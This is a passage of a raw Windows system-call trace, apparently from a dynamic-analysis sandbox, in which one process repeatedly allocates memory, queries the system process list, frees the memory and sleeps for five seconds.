ResultLength=0x0) returned 0xc0000004 [0270.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.756] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.776] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.790] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.797] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.803] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.810] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.825] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.846] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.855] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.864] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.874] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.884] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.887] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.893] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.902] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.911] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.919] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0270.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0270.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0270.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0270.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0270.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0270.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0270.930] NtAllocateVirtualMemory (in: 